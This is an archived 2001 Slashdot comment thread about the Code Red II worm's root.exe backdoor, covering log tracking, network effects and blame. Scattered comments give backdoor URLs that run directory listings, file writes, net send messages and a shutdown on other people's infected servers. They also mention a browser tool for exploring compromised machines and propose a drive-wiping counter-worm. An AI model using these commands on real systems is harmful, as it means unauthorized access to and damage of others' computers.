Code Red II: Shells for the Taking

sigurdur writes "It seems there is a new and more malicious version of Code Red out there. This one seems to try and copy cmd.exe into a position where it is accesible to us all - the scripts directory. So far I have seen it reported on the intrusions-list at incidents.org where they also just put up a notice about this third generation Code Red worm." I still think sircam is more annoying since it affects every email user, and not primarily poorly administered websites. But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?

Re:Apache users Create default.ida 5mb!!!!

[beable]

How about if somebody writes a default.ida script which sends the attacking server a GET /default.ida which makes the server go to miscrosoft.com, download and install the patch, and reboot itself? That'd be neat.

Some Individual Forensics

[VB]

Are here.

Frustrated by the lack of any current stats on this from DShield, or Incidents short of the update on the 4th, I collected some stats that might give some indication of where this thing is going. Peak times at 1300 and 1400 MST. Not sure what this means, but seems consistent.

Re:Help track this: submit your logs to dshield!

[mjh]

Wow, that's excellent. Can you put up a pointer to your netcat config? I have one machine that is a webserver and it's pretty easy to track CR with it. But I'd like to be able to track on some of my other machines, and I see no reason for adding apache just to track this thing.

TIA.

Oh god this is too much fun!

[ZanshinWedge]

I've created a script that parses my server logs for code red hits, then prints up a webpage with each ip linked to "http://[ipaddy]/scripts/root.exe?/c+dir+c:\". It's amazing how many people's computers are just wide open. It's really easy to create, rename, delete, or display just about any file on the poor saps computer. For example, "http://[ipaddy]/scripts/root.exe?/c+echo+IIS+SUCK S!+>+c:\CODEREDATETHELASTOFYOURCORNFLAKES.txt".

I mean, errr, hypothetically it would be possible to do such things, uhhh yeah.

Re:Oh god this is too much fun!

[traphicone]

How about something even more in your face:

http://[ipaddy]/scripts/root.exe?/c+net+send+*+You +are+infected+with+the+Code+Red+II+worm.++Go+and+p atch+IIS+already!

Re:Origin of Code Red?

[BalDown]

Actually, yes it is based on Code Red Mountain Dew, and Pepsi evidentally didn't regard it as negative advertising, as last week they shipped over tons of cases of Code Red MD to the EEye team that named it.

Re:this sucks

[raju1kabir]

with raw sockets, you can go into things that cant be done legally according to protocol, so now you can stuff round, triangular, and star shaped pegs through the square hole. things will break. its like trying to run a car on water, or trying to withdraw cash from an atm with the ace of spades.

You need to put down the Gibson crack pipe and start speaking in real-world terms. Square pegs? Ace of spades? Random hallucinatory metaphors do not a persuasive argument make.

Do you have an example of how malformed packets could be used to "take over" something? They're occasionally effective tools for DOS (though less and less as IP protocol handler authors stop making silly assumptions), and I do recall one FreeBSD ipfw vulnerability that hinged on the ability to set a certain flag in the packet header, but basically this is not such a big issue. All the fun and power is at higher levels - in the application layer.

Re:The Breaking Point

[nugatory]

So, which will it be, folks?

None of the above.
The two historical precedents that come to mind are:

• The Grand Canyon midair collision on 30 June 1956
• The sinking of the Titanic

In both cases, technologies failed in ways that (in hindsight) were predictable and even inevitable consequences of growth beyond the their roots. In both cases, the response was moderate, incremental, and designed to preserve existing investments in these technologies. The lesson is that the "breaking point" for a widespread infrastructural technology is very hard to reach. And, like it or not, Windows is one of these technologies.

Instead, what we'll see happen is more attention to security, taken in small steps. More people will subscribe to alert services, and they'll be willing to pay more for them. Bosses will start asking sysadmins what they've done for security today, and be more willing to sign purchase orders for security-related work. ISPs will pay a bit more attention to open ports on their home users, and some will scan their networks for known security vulnerabilities. OEMs configuring systems for naive users will discover that people will pay for a "safe out of the box" configuration, so they'll start to offer one. And so on, and so on....

The normal state for an economically useful thing is to be stressed, but not stressed to the breaking point. This should be pretty obvious: if it's not stressed, it was uneconomically overbuilt. We are very far from the breaking point for Windows.

Help track this: submit your logs to dshield!

[mjh]

You might want to consider submitting your apache logs to dshield. This will help keep track of the extent of this problem as well as help to analyze where it may have originated. If the dshield folks can correlate the earliest attacks of the latest variant, they have a chance at finding where this thing originated.

Submissions can be made by following these instructions.

Re:Help track this: submit your logs to dshield!

[Talla]

The people who made this don't seem completely clueless, so I doubt there is much use. They will probably have listened for attacks from CR1, and only infected those. You may find them, and even the persons responsible for the servers, but considering the backdoor, it's unlikely there'll still be usable log files.

Re:Help track this: submit your logs to dshield!

[MS]

You're an NT-Admin?
And you have grep on your NT-box right?
Not really!
That's why NT-Admins always need 3rd party software, even for such basic tasks as extracting lines from a logfile for submitting them to DSHIELD.

:-)
ms
--

Re:Help track this: submit your logs to dshield!

[Telek]

Yup, forgot the :) at the end. I just thought that the program name was rather ironic...

Re:Help track this: submit your logs to dshield!

[mutende]

Too bad they don't take snort logs.

Please let me quote from DShield's Linux Clients page:

"If you are using Snort, download dshield_snort.pl. or the snort portscan format client: snort_portscan.pl"

Re:Help track this: submit your logs to dshield!

[Fishstick]

>vunerabilities.org, a security scanning site, is listed in the top ten

Also interesting is the statistic associated with this listing, 31526/2

The first number is the number of "lines implicating this attacker", the second "number of targets attacked".

Does this mean only two hosts reported an attack, but over 30,000 times?

For comparison, 202.75.141.158 is now in first place with 97657/56947

Re:Help track this: submit your logs to dshield!

[mjh]

I route all traffic coming in on port 80 to /dev/null just so snort can keep an eye on the attacks as they're coming in.

I could be wrong, but I don't think you need to do this. Snort will track this independant of what your firewall is setup to do. Snort operates independant of the IP stack. It uses libpcap to sniff all packets that the interface receives. And if you configure snort to use promiscuous mode, then it'll even track attacks that aren't directed towards your machine.

So I don't know for sure, but I don't think you need to route your port 80 packets anywhere. I think it'll track it just as long as it gets to your interface.

Re:Help track this: submit your logs to dshield!

[MS]

UNIX - a bad idea 20 years ago a fucking nightmare now.

That may be true for you - I enjoy using Unix/Linux (I use it on several servers), while it is a nightmare for me administering NT-Boxes (Yes, I administer also an NT-Server)

And yes, I use grep all the day for various tasks, in cronscripts, from command-line... and it is one of the most useful pieces of "UNIX" together with sed, awk and others. Maybe you have grep on your NT-box - I don't, or at least I didn't find it.

But then, maybe you are kidding me and simply forgot to put a smiley there.

ms

Re:Help track this: submit your logs to dshield!

[mjh]

Snort will track this independant of what your firewall is setup to do

Of course this assumes that snort is running on your firewall! If it isn't well then of course this won't work.

Re:Help track this: submit your logs to dshield!

[LinuxHam]

It uses libpcap to sniff all packets that the interface receives. And if you configure snort to use promiscuous mode, then it'll even track attacks that aren't directed towards your machine.

I'm on 56k ppp dialup, so I shouldn't see any attacks (let alone packets) not destined for my machine. Now that you know that, you should also know that I was rejecting all connections to port 80 with ipchains. Therefore, since the worm couldn't connect, it wouldn't transmit the HTTP request that snort is watching for.

By hanging netcat on port 80 with a 3 second connect limit using xinetd, all inbound port 80 probes get connections. They send their payload, snort alerts on it, netcat routes it directly to /dev/null, and then closes the connection. No huge apache logs, or whatever minimal risks are associated with apache.

I shunt the payloads directly to /dev/null just so snort can actually watch them coming in. I literally asked for a "dummy listener" on the snort list, and they pointed me to netcat at l0pht.

Re:Help track this: submit your logs to dshield!

[LinuxHam]

Too bad they don't take snort logs. I route all traffic coming in on port 80 to /dev/null just so snort can keep an eye on the attacks as they're coming in.

Re:Help track this: submit your logs to dshield!

Does anyone else find it ironic that vunerabilities.org, a security scanning site, is listed in the top ten attackers on dshield.org? At least, it is listed as of 16:45 EDT.

Re:Help track this: submit your logs to dshield!

[siokaos]

Yeah right! I'm sure they want a list of infected boxen so they know who they can root. Writing a program to follow millions of pathways back to one/a group of IPs is tedious, when you can use that same IP list for evil!

Re:Help track this: submit your logs to dshield!

[Telek]

Why in god's name would I want to run a program called CODERED.EXE on my server?!

Re:Help track this: submit your logs to dshield!

[LeBleu]

Take a look at http://www.dshield.org/howto.html, it says how to submit snort logs.

Re:Listen Code Red * authors!

[Unknown+Bovine+Group]

Why don' t you add a checking to stay away from Apache servers?! The worm would be more difficult to trace without all those access.log evidence....

<SarcasticBitchslap>Yeah, since Apache is the only web server that logs access. </SarcasticBitchslap>

Re:Origin of Code Red?

[Fishstick]

>My first guess was Coca-Cola

A Pepsi product (mountain dew), actually

crack the code

Tastes like cough syrup but has a pretty good kick (hate to think about what that much red food color does to your internal organs though).

Bandwidth

[nick_davison]

But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?

I kind of find myself wondering, which wastes more bandwidth: the virus itself of all of the discussion about the virus?

I'm assuming the virus wastes vastly more. That said, take a look at the way every news site is covering it, the large images they have accompanying the stories and the vast numbers of people reading them because MSN messenger tells them it's important. I don't know if there is any way of measuring the bandwidth wasted by each but it'd be an interesting ratio to see, if there was.

Re:Bandwidth

[zexxxx]

which wastes more bandwidth: the virus itself or all of the discussion about the virus?

The virus is to blame for it all. The discussion is about the virus. No virus, no discussion.

Re:Bandwidth

[driehuis]

I'm assuming the virus wastes vastly more.

Speaking from the bowels of corporate hell, I can assure anyone that the bandwidth issues are as to nothing compared to the manpower invested.

I've applied the C2 security fixes to out IIS server (they're secret, don't ask me about details or I'd have to bury you). But still, the bleeding thing kept attacking our Apache and Netscrape servers, and you don't want to know the pain and suffering of explaining the risks to the end users...

Re:Bandwidth

[TrixX]

The bandwidth wasted by the virus is actually wasted, and useless.

But if all the news, the discussion and similar are useful to make sysadmins a little smarter and make them use less vulnerable servers, or at least keep security patches up to date, I think that is not "waste".

Re:Ummm, no actuall

[Carnivore]

Unfortunately, many shellfish become very toxic if they are dead and uncooked. Maryland Blue Crabs are a classic example--they are always cooked live.
I would also argue that your average sadist wouldn't get a whole lot out of it because crabs and lobsters really aren't that bright. The pleasure of sadism comes out of the mental domination of the other party. Generally, an intelligent creature is required. (this is all from a college psycology class years ago)

Killing small ISPs

[Alien54]

I know of at least one small ISP that had very serious problems this week.

First one of the top dogs in the place sent sircam throughout the company. This was a really bad hair day.

Then they had a separate second problem where user mail boxes flooded out crashing the mail server, among other strange things. Imagine users with DSL lines sending out multimegabyte files that bounce. Considering that most ISPs configure the drive space for mail based on average usage of users, and do not set aside the actual amount of drive space for user mail, etc. that has been promised for all users.

BOOM!

If this keeps happening, this is going to be bad for business in a lot of places.

Re:Killing small ISPs

[cybersmith]

Code Red, Sircam... they are just the tip of the iceberg. Can you imagine what would happen if a virus similar to Code Red were infecting windows 95/98/Me boxes instead of those running NT/2000 with IIS. ISP's and other corporations need to seriously look at installing filters such as the procmail sanitizer. I have installed this on several system's and it catches over 150 viruses a day, and notifies those infected on how to remove the virus from their system. It's only a matter of time until the Next Code Red hits... one that isn't so easily tracked and acts with a lot more malice (ie. random smurfing/flooding, reg eating, changing number's in excell doc's, reformating outgoing e-mail, posting personal information to usenet, ect.)

Re:Killing small ISPs

[slamb]

I know of at least one small ISP that had very serious problems this week. First one of the top dogs in the place sent sircam throughout the company

I have absolutely no sympathy for them. It's maybe understandable when someone from completely outside a computer-related field propogates a virus like that. But anyone at an ISP should know better. I don't care if they are in a non-technical position there; they still should have a basic understanding of what their company does. And the most basic understanding is all you need to not be infected.

Re:Killing small ISPs

[thrig]

Translation: using Microsoft is bad for business.

Re:Killing small ISPs

[Mike+Schiraldi]

Watch out, "Microsoft Worm" looks awfully similar to the name of a popular word processing application... If you thought you could get in trouble with the feds for writing and releasing a worm, wait till you see what Microsoft's trademark attorneys will do to you.

Re:Killing small ISPs

[sirPaul]

From small ISP bosses to world leaders and FBI agents:

CNN story about Ukraine President getting SirCam.

Newsbytes story about FBI agent w/SirCam.

Re:Killing small ISPs

[ethereal]

It's about time people figured out that Microsoft is bad for business :)

Re:Killing small ISPs

[Velox_SwiftFox]

You run port 80 requests through procmail? Code Red doesn't spread though email, you know.

In any case, since Microsoft doesn't insall it easily, too few Win9x/Me boxes are running Personal Web Server. I don't think it even includes the vulnerable Index Server component.

Re:Killing small ISPs

[Chilles]

I must disagree with you on this point.
Yes they should know better, and yes, they probably didn't keep their servers entirely up to date with the latest security updates, but nothing would have happened if nobody had written this worm.
Next thing the police tells me I'm to blame for the latest break in in my house because my door wasn't patched against the latest models crowbar.
They just suffered a lot of damage because some jerk somewhere lacks a decent moral and ethical education.

Re:Killing small ISPs

[dizco]

The police won't tell you that, but if you discover that your front door's lock has become ineffective, and you fail to fix it, i'll certainly call you a moron.

--sean

Re:Killing small ISPs

[slamb]

Yes they should know better [...] but nothing would have happened if nobody had written this worm.

I agree absolutely; the writers of these worms deliberately caused a lot of people a lot of stress. There's no excuse for that. They're bastards. But that doesn't change the fact that the people at this ISP would have had no problem if they were competent at their jobs. It's their job to know how to deal with computers; they apparently do not. It's hard for me to be sympathetic.

and yes, they probably didn't keep their servers entirely up to date with the latest security updates

I was talking about the SirCam worm in particular here the one that you need to actually run yourself to get infected with. Missing a security patch is more understandable to me, although ideally people would be vigilant as well as running software that doesn't need to be patched so often.

Next thing the police tells me I'm to blame for the latest break in in my house because my door wasn't patched against the latest models crowbar.

Not to blame, but it's much easier for me to have sympathy for someone who's stuff is stolen despite good common sense than for someone who doesn't even lock the door when (s)he goes on vacation.

They just suffered a lot of damage because some jerk somewhere lacks a decent moral and ethical education.

and because they weren't at all cautious. There are plenty of people who had absolutely no problem with SirCam because they were smart enough not to open and run double-named attachments sent to them by a near-illiterate masquerading as someone they may vaguely know (the email addresses it gives aren't necessarily at all close acquaintances). I just don't understand how people in the computer industry could fall victim to SirCam.

Re:Killing small ISPs

[cybersmith]

I'm just saying that worms are here to stay, no matter what form or shape they use to spread. (e-mail or via exploits) So we need to protect users from themselves.

Re:huge cable modem hits

[lqx]

Optus@Home which is the sole @home provider in Australia is already doing this. They are blocking all incoming port 80 traffic from outside their subnet. However, I'm still getting numerous attempts in my ipchains log.

The matter of fact is that at least this has shielded most of the users from external infections, but pointless when u still have users within subnet infecting each other over and over again :)

Re:213.77.4.237 has been attacking me and

[Lord+Azrael]

shall we all now post IP adresses of victims? This is senseless. I do get about 5 entries per 10 seconds in my logfile from thousands of different servers. reverse lookups show many victims on cable oder dsl modems (@home) and just 30% of all ip's are real webservers. so at least all dialup victims can't be informed and my mails to the others where a reverse lookup reveladed who is running that to the postmaster or webmaster came back. its unbelievable, i have 70 websites running on my box and still i do get more code read calls than for normal webpages. thank good its linux.

Sue Microsoft - its time for class action

I'm surprised that Microsoft has escaped a huge class-action lawsuit for all the damage their products have piled upon their users and non-microsoft users. Its about time that somebody takes this on. I live in a Unix world but I'm tired of all the problems Gates and co. cause me.

Re:The Whitehouse.gov lesson

[fanatic]

Actually, they moved it to akamai, a large network of servers distributed across the internet. Requests are spread out over several servers, thereby making the site as a whole more resistant to DDOS. (They just happen to be Linux). Microsoft did the same thing with their DNS servers after these were DDOS'd earlier this year. A network like Akamai may be the only real defense against a good DDOS (syn flood, spoofed IPs) that doesn't involve ignoring some lgeitimate requests as well as the trash.

Re:Why do people still use Outlook?

[arielb]

what did she think it was? Iced coffee? Of course you'll burn yourself if you spill coffee on your lap. That's why you should be careful! WHat's next? Suing tea kettle companies if you are such a klutz that you spilled boiling water all over yourself?

Re:Apache users Create default.ida 5mb!!!!

[ichimunki]

Yuck! How about if it just deinstalls IIS altogether and sends an email to root (or whatever it's called on NT) explaining that they have forfeited their right to host web services since they can't be bothered to secure them with known patches for worms that are making headlines in non-tech journals even? And considering that .ida sounds like something that should be turned OFF by default and certainly should NOT include a default.ida page (which I'm guessing some "thoughtful" developer included to prevent 404 errors in the default install/demo install), they might consider finding server software that comes preconfigured to be a little more sensible than that.

Re:Code Red Infects Slashdot!

[thrig]

I braved the evil frames of the securityfocus website to bring you:

http://www.securityfocus.com/archive/1/198282

Re:Ummm, no actuall

[Unknown+Bovine+Group]

I don't care what anyone says, cooking an animal alive is just fucking sadistic.

Or as Homer would say, "MMmmmm, sadisti-licious!"

Re:huge cable modem hits

[Aexion]

I'm a dsl customer and I'm also seeing a lot of attempts to spread the code red I and II worms. After noticing that my dsl modem was flickering constantly even after powering down all of my connected computers I became curious and fired up nuke nabber which displayed the signature for the code red worm coming in on port 80. I watched for a while and also noticed that the activity lights on my dsl modem were flickering much more frequently than any requests being reported by nuke nabber. I then installed a packet sniffer so I could take a closer look at what was going on. Here's where I get in over my head...

I see constant ARP broadcasts with MAC addresses. I don't really know much about this and am not sure how to interpret what's going on. Can anyone suggest some good resources that might help me decypher this traffic? I wondered if it was perhaps my service provider broadcasting the DHCP address (I'm sure my ignorance of this subject matter is now glaring...) but from my research on how DHCP works I don't think this is what's happening. Any suggested references or information would be greatly appreciated.

Thanks,

Aexion

Re:Why do people still use Outlook?

[Tuonenkielo]

The McDonals coffee case judge was not braindead. get teh facts straight, they have been mentioned even here hundreds of times already. The coffee was hot enough to cause severe burns on contact, and McD knew it was so and they still sold the coffee at such temperature. Not that having some judgement like that against MicroSoft wouldn't be nice. Of course, it might not help much in getting MS to clean up their act.

Re:Code Red Infects Slashdot!

[berenddeboer]

> It is on or near this day that Microsoft's > software became, without a doubt, a public > nuisance to the internet. I've not seen anyone mentioned the underlying causes for buffero verflows. There are two: 1. The C language, written for programmer gods. Unfortunately, MS hasn't one. If they had used Pascal (Eiffel/Ada/...) and had range checking on, they would have been safe. 2. The Intel processor that let's code on the stack to be executable. Without these two, the Internet would have been a lot safer. And it would have safed lots of security code reviews too. Groetjes, Berend. (-:

Re:huge cable modem hits

[jackb_guppy]

Not completily true.

@home at home, it is true no public servers.

But a business connection can...

I have High School in Kansas, a pair or cops in Ohio just banging away. Firewall is eating them all. I have many more that it looks like AT$T have taken off the air.

Code Red II (or III) on cable modem segments

[possible]

I posted this to Bugtraq last night but it got rejected. :P

Anyways, if cable modem users are seeing drastically increased ARPing, the targeting of the Code Red III variant should explain it -- hitting non-existent addresses on your subnet will cause the CMTSheadend router to ARP out to see who's got that address, you get the picture.

At the very least, it's a good opportunity for users to see how many modems your provider has packed onto your segment. If they've packed too many on there, you can be sure the CMTS router's going to get seriously bogged down.

I have an automated program which sends the IP addresses to the ARIS list *and* to my ISP's security department (those IP's which fall under their management) -- I wonder if ISP's are considering just dropping all packets from infected hosts, so when the customer comes to them and complains, they say "Oh, you're infected, reboot, install the patch, and we'll reconnect you." Seems that this would reduce the load on the CMTS and would be faster than trying to track down each customer individually.

Chad Loder

Rapid 7, Inc. - Next generation security products and services

http://www.rapid7.com

Re:Code Red II (or III) on cable modem segments

[myz24]

I know I have on our cableone network. I'm seeing up to 5.8k bytes per second of arp traffic. And considering how busy Sundays are I'm thinking the traffic will increase. I have pictures of the amount of traffic I'm getting at this place. I'm using iptraf and gkrellm.

Re:Code Red II (or III) on cable modem segments

[rjamestaylor]

Same thing here - sample tcpdump on eth0:

tcpdump: listening on eth0
19:14:07.770553 B arp who-has 66.74.1.213 tell 66.74.0.1
19:14:08.020553 B arp who-has 66.74.1.184 tell 66.74.0.1
19:14:08.580553 B arp who-has 66.74.1.112 tell 66.74.0.1
19:14:08.910553 B arp who-has 66.74.1.226 tell 66.74.0.1
19:14:09.180553 B arp who-has 66.74.1.158 tell 66.74.0.1
19:14:09.320553 B arp who-has 66.74.1.8 tell 66.74.0.1
19:14:09.500553 B arp who-has 66.74.1.159 tell 66.74.0.1
19:14:09.570553 B arp who-has 66.74.1.252 tell 66.74.0.1
19:14:09.700553 B arp who-has 66.74.1.116 tell 66.74.0.1
19:14:09.890553 B arp who-has 66.74.1.253 tell 66.74.0.1
19:14:10.000553 B arp who-has 66.74.1.183 tell 66.74.0.1
19:14:10.220553 B arp who-has 66.74.1.108 tell 66.74.0.1
19:14:10.290553 B arp who-has 66.74.1.192 tell 66.74.0.1
19:14:10.380553 B arp who-has 66.74.1.147 tell 66.74.0.1
19:14:10.840553 B arp who-has 66.74.1.113 tell 66.74.0.1
19:14:10.950553 B arp who-has 66.74.1.71 tell 66.74.0.1
19:14:11.630553 B arp who-has 66.74.1.237 tell 66.74.0.1
19:14:11.800553 B arp who-has 66.74.0.127 tell 66.74.0.1
19:14:11.800553 B arp who-has 66.74.1.181 tell 66.74.0.1
19:14:11.880553 B arp who-has 66.74.1.226 tell 66.74.0.1
19:14:12.260553 B arp who-has 66.74.1.18 tell 66.74.0.1
19:14:12.270553 B arp who-has 66.74.1.8 tell 66.74.0.1
19:14:12.280553 B arp who-has 66.74.1.98 tell 66.74.0.1
19:14:12.360553 B arp who-has 66.74.1.146 tell 66.74.0.1
19:14:12.980553 B arp who-has 66.74.1.122 tell 66.74.0.1
19:14:13.070553 B arp who-has 66.74.1.132 tell 66.74.0.1
19:14:13.140553 B arp who-has 66.74.1.108 tell 66.74.0.1
19:14:13.300553 B arp who-has 66.74.1.192 tell 66.74.0.1
19:14:13.330553 B arp who-has 66.74.1.208 tell 66.74.0.1
19:14:13.590553 B arp who-has 66.74.1.126 tell 66.74.0.1
19:14:13.730553 B arp who-has 66.74.1.145 tell 66.74.0.1
19:14:13.800553 B arp who-has 66.74.1.113 tell 66.74.0.1
19:14:13.910553 B arp who-has 66.74.1.71 tell 66.74.0.1
19:14:14.690553 B arp who-has 10.74.0.180 tell 10.74.0.1
19:14:14.770553 B arp who-has 66.74.1.181 tell 66.74.0.1
19:14:15.250553 B arp who-has 66.74.1.98 tell 66.74.0.1
19:14:15.320553 B arp who-has 66.74.1.146 tell 66.74.0.1
19:14:15.320553 B arp who-has 66.74.1.159 tell 66.74.0.1
19:14:15.610553 B arp who-has 66.74.1.231 tell 66.74.0.1
19:14:15.910553 B arp who-has 66.74.1.253 tell 66.74.0.1
19:14:16.060553 B arp who-has 66.74.1.189 tell 66.74.0.1
19:14:16.060553 B arp who-has 66.74.1.132 tell 66.74.0.1
19:14:16.400553 B arp who-has 66.74.1.41 tell 66.74.0.1
19:14:16.590553 B arp who-has 66.74.1.125 tell 66.74.0.1
19:14:16.610553 B arp who-has 66.74.1.126 tell 66.74.0.1
19:14:16.680553 B arp who-has 66.74.1.145 tell 66.74.0.1
19:14:17.060553 B arp who-has 66.74.1.169 tell 66.74.0.1
19:14:17.130553 B arp who-has 66.74.1.79 tell 66.74.0.1
19:14:17.280553 B arp who-has 66.74.1.35 tell 66.74.0.1
19:14:17.540553 B arp who-has 66.74.1.254 tell 66.74.0.1
19:14:17.910553 B arp who-has 66.74.1.226 tell 66.74.0.1
19:14:18.040553 B arp who-has 66.74.1.223 tell 66.74.0.1
19:14:18.230553 B arp who-has 66.74.1.8 tell 66.74.0.1
19:14:18.460553 B arp who-has 66.74.1.115 tell 66.74.0.1

Re:Someone needs to write

[Grishnakh]

No, someone needs to write a strand that simply shuts down (or better yet wipes out the hard drives of) MS IIS servers. They're a hazard to everyone else on the internet and should be removed.

But I've had CodeRed

[mattvd]

I don't know what you all are talking about...I've been drinking CodeRed for months now. Its red, highly caffinated, and tastes like Mountain Dew. Only fruitier.

I just I'm just more 1337 than all you.

:-)

Re:But I've had CodeRed

[arielb]

well you just drank a virus. buhbye!

CodeRed2 Explorer for your viewing pleasure

[leonbrooks]

It's a bit slap-dash, but here's CodeRed2 Explorer for your PHP-enabled web server. No need for Telnet, even: explore Windows-land a click at a time from the comfort of your browser. (-:

PLEASE MIRROR THIS and post your mirror URLs in reply to this message (subject Mirror of CodeRed2) since that server is a club server, low bandwidth, low budget. But very secure (Debian on Sparc and well maintained :-)

SlashDot (the pikers )-: wouldn't let me post directly to this page.

Re:Securityfocus asks for IPs

[NullAndVoid]

cat access_log | grep default.ida | tr -d '[' | tr -d ']' | awk '{print $1 " " $4 " " $5}'

Hmm, tr barfs for me because [ and ] are special (maybe a Solaris peculiarity?). So I used:

grep default.ida access_log | tr -d '\[\]' | awk '{print $1 " " $4 " " $5}'

Saved a couple of processes too. *Why* do so many people insist on adding spurious "cat" processes to the beginning of pipelines? It's always at the beginning, too, nobody adds them at the end.

Re:They deserve it

[LinuxHam]

same exploit over a couple of weeks

Weeks.. heck, months. Some are saying that CRII is reusing the "copy cmd.exe to \scripts" trick that first appeared with the Sadmind/IIS worm... BACK IN MAY!!

Now THAT is insane! :)

Re:I'm sorely tempted . . .

[IdentityCrisis]

ah found it here try this instead rundll32.exe Shell32.dll,ExitWindowsEx,0x1

Re:Sadmind/IIS unicode worm already did that

[LinuxHam]

Code Red and Sadmind/IIS does not use the same vulnerability

The poster was not referring to the type of attack. He was referring to the back door that only CR-II installs on the victim server. CR-II does indeed install the same back door that Sadmind installed.. that is, copying cmd.exe to %iisroot/scripts as root.exe.

This probably would do them a favor

[eean]

I've been going to some of the people that are trying to attack me and the majority are not operating. In otherwords, people who probably completely forget that they even have IIS.

Re:This probably would do them a favor

[Lord+Azrael]

you're right. since at least what i have seen on my server 70% are behind cable oder dsl modems these are the victims which use win nt or win2k for private use only and maybe have never heard of the word patch anyway. it's not the lazy administrators on the boxes where some have not done their homework by applying a 2 month old patch, it really is the stupid windows user who simply purchased win2k for private use and does not even know that he has something running called IIS.

Re:It is the time

[Tackhead]

> you aren't seeing the other because you're vulnerable to them!

Yeah, I probably should have explained that I was running Apache at the time, which is what made it something to laugh at rather than worry about.

I didn't see any actual 'sploit attempts from that IP, so either he was a harmless joker with a web browser, or he was changing the GET string based on how the server identified itself. But if he was doing that, why even send a string to an Apache server. So my hunch is he was just a guy who'd drunk too much coffee.

(Hmm, configure Apache to misidentify itself as an IIS box the next time a worm shows up... lousy web serving idea, but a nice honeypot idea ;-)

Re:The Breaking Point

[daveisoverlord]

Government Intervention. ...What would really get interesting is if the Feds pass some sort of laws, either making people responsible for keeping their systems secure, or defining what kind of liability software manufacturers are exposed to in these circumstances

With no legislation being passed after the massive DDoS attacks last year on EBay, et al - I seriously doubt anything is going to passed now. I thought that situation was the best chance for legislation. Since many of those companies don't make any money unless people can get to their site, I expected them to lobby heavily for some stiff penalties. When big companies stand to lose big money, you usually see laws passed. So if it didn't happen then, I seriously doubt it will happen now.

Re:huge cable modem hits

[lqx]

Yes, I'm seeing an ungodly number of ARP requests as well, which may also be Code Red connected. (Who knows.)

Definitely so. Code Red just randomly picks IP addresses to infect, so you'll see it generating ARP requests to actually get to those IPs .. Even if those IPs aren't connected to anything, hence the ARP requests just keep retrying until they timeout and give up.

Happy Code Worm Day!

Re:potential for something worse

[Borogove]

The IIS weakness is found. The CodeRedII System goes on-line August 4th, 2001. Human decisions are removed from strategic hacking. CodeRedII begins to spread at a geometric rate. It becomes self-aware at 2:14AM, Eastern Time, August 29th.

Re:It's easy to secure your IIS..

[Telek]

(pardon the caps, but I'm pissed) AND I AM SICK AND TIRED OF EVERYBODY BLAMING MICROSOFT AND THEIR PRODUCTS FOR PROBLEMS THAT ARE NOT ALWAYS THEIR FAULT. Yes yes yes, every software is going to have problems, *nix'es have all had theirs. The problem here lies in the fact that the majority of servers that have been compromised are either (a) small personal-type sites or (b) don't even realize that they are running a server. It's hard to tell people to protect their systems when they don't even think that it's their system that they need to protect. And before you go bashing MS about this one (i.e. that it's installed by default) keep in mind that if the user knew what they were doing, they'd either disable it or would know to secure it. People who use *nix tend to be technosavvy and therefore will be very consciencous about what software they're running and apply the patches at the proper times, whereas W2K admins aren't always "on the ball". But stop blaming microsoft for everything here.

Re:this sucks

[aechols]

yes, it means script kiddies can run their little programs with even more ease. syn floods, stealth searches, etc. the classic attacks like ping of death, teardrop, boink, and friends need a raw socket to make malformed packets. although these are not threats any more, similar holes are bound to appear.

my point about raw socket support & code red is that a similar worm could appear, one that requires the use of malformed packets to take control of the IIS server/other microsoft product. it would be able to make these malformed packets by utilizing raw sockets

It is the time

[Pat__]

I think it is about time to write the exploit that will take all those vulnerable IIS servers with a open command shell and remotely patch them once and for all :-)
At least to get it over with this Code Red thingy!

On a completely other note! I was thinking it would be nice if the worm copied random text strings (from the victim's hard drive) instead of the XXXXXXXXX in order to overrun the buffer :) Then it would be really interesting to read those log files!

Re:It is the time

[Tackhead]

> On a completely other note! I was thinking it would be nice if the worm copied random text strings (from the victim's hard drive) instead of the XXXXXXXXX in order to overrun the buffer :) Then it would be really interesting to read those log files!

Well, I haven't seen that yet, but I saw something even funnier:

999.999.999.999 - - [04/Aug/2001:23:43:18 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXJust_Kidding___Now_H ow_About_Running_Apache_Instead_of_IIS HTTP/1.0" 404 282 "-" "-"

(Yes, just some guy with a sense of humor and a web browser, not enough Xs to trigger the overflow ;-)

Re:It is the time

[ass1m1l8]

On a related note, since most of these new Code Red attacks are relatively local to you, you can helpfully inform people that they've been infected by using "net send".

Proper syntax: net send "Your system appears to be harbouring the Code Red virus. Please patch your IIS server"

This should cause a dialogue box to pop-up on the target system with your message in it. They have to click on "OK" to get it to go away.

Re:It is the time

[tstock]

How about a perl or sh script to:

parse logfile;
extract IP's that are infected
nslookup their domain
email root@domain form letter

please email me if anyone did this.

Re:It is the time

[FuegoFuerte]

how do you tell net send what machine to send to? I've been playing with it a bit on my win2k box and can't get any messages to pop up on my screen. I tried `net send 127.0.0.1 "hello"` and got error 2273. ("The message alias could not be found on the network.") I also tried using my netbios name and my NICs IP address, to no avail.

Re:It is the time

[p_trinli]

Naw, man, White Hats should make their counter-virus install the ultimate patch:

...Linux (FreeBSD, etc.)

Re:It is the time

[cluthu]

Assuming my hostname was 'bloggs' (it isn't, btw), I run: net send bloggs hello and it'll open up a window. You have to be running the Messanger service for this to work.

Re:Origin of Code Red?

[Corrado]

Code Red is the new cherry flavored Mountain Dew.

MOD this up (+1 funny) !

[whizzmo]

(sorry, but I gotta)

Re:Wasted bandwidth

[sqlrob]

Just cause it's in a EULA doesn't make it enforceable.

Re:huge cable modem hits

[interiot]

If you consider that @Home's acceptable use policy explicitely says that running servers isn't allowed... there are two interesting things to note. First, there are a lot of people running public web servers that @Home just ignores. Another thing is that it probably wouldn't be a problem legally for @Home to minimize the impact of code red by blocking port 80 traffic like they did with port 137, at least temporarily.

The old /scripts/root.exe

[Gnight]

Copying cmd.exe into the /scripts directory to gain access to the system is nothing new.

One bug in IIS's let you (through HTTP requests) access the filesytem and run simple commands (this is very sad). The first thing that a cracker would do is copy cmd.exe into the scripts directory.

One of the servers at my school got hacked this way. I just had to laugh at the simplicity of the hack.

Re:I'm sorely tempted . . .

[Phroggy]

Unfortunately, it doesn't look like the root.exe installed by Code Red has Administrator privaleges, which iisreset.exe needs. Or at least, that's my guess, since it isn't working.

Re:Logging the worm

[Amerist+A'Toll]

Really nice!

